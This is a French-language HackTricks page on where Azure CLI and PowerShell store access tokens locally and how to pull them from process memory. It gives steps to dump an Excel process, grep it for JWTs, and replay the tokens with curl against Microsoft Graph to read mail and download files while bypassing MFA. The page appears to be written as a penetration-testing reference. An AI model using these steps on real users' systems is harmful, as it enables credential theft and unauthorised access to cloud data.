HackTricks CloudAz - Local Cloud Credentials
Reading time: 4 minutes
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : 
HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure : 
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
Stockage local des jetons et considérations de sécurité
Azure CLI (Interface de ligne de commande)
Les jetons et les données sensibles sont stockés localement par Azure CLI, soulevant des préoccupations de sécurité :
- Jetons d'accÚs : Stockés en texte clair dans
accessTokens.jsonsituĂ© ĂC:\Users\<username>\.Azure. - Informations sur l'abonnement :
azureProfile.json, dans le mĂȘme rĂ©pertoire, contient les dĂ©tails de l'abonnement. - Fichiers journaux : Le dossier
ErrorRecordsdans.azurepeut contenir des journaux avec des identifiants exposés, tels que :
- Commandes exécutées avec des identifiants intégrés.
- URL accessibles à l'aide de jetons, révélant potentiellement des informations sensibles.
Azure PowerShell
Azure PowerShell stocke Ă©galement des jetons et des donnĂ©es sensibles, qui peuvent ĂȘtre accessibles localement :
- Jetons d'accĂšs :
TokenCache.dat, situĂ© ĂC:\Users\<username>\.Azure, stocke les jetons d'accĂšs en texte clair. - Secrets de principal de service : Ceux-ci sont stockĂ©s non chiffrĂ©s dans
AzureRmContext.json. - Fonctionnalité de sauvegarde de jetons : Les utilisateurs ont la possibilité de persister les jetons en utilisant la commande
Save-AzContext, qui doit ĂȘtre utilisĂ©e avec prudence pour Ă©viter tout accĂšs non autorisĂ©.
Outils automatiques pour les trouver
Jetons en mémoire
Comme expliqué dans cette vidéo, certains logiciels Microsoft synchronisés avec le cloud (Excel, Teams...) pourraient stocker des jetons d'accÚs en texte clair en mémoire. Donc, simplement dumping la mémoire du processus et greppant pour des jetons JWT pourrait vous donner accÚs à plusieurs ressources de la victime dans le cloud en contournant MFA.
Ătapes :
- Dump les processus Excel synchronisés avec l'utilisateur EntraID avec votre outil préféré.
- Exécutez :
string excel.dmp | grep 'eyJ0'et trouvez plusieurs jetons dans la sortie. - Trouvez les jetons qui vous intéressent le plus et exécutez des outils sur eux :
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
Notez que ce type de jetons d'accĂšs peut Ă©galement ĂȘtre trouvĂ© Ă l'intĂ©rieur d'autres processus.
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.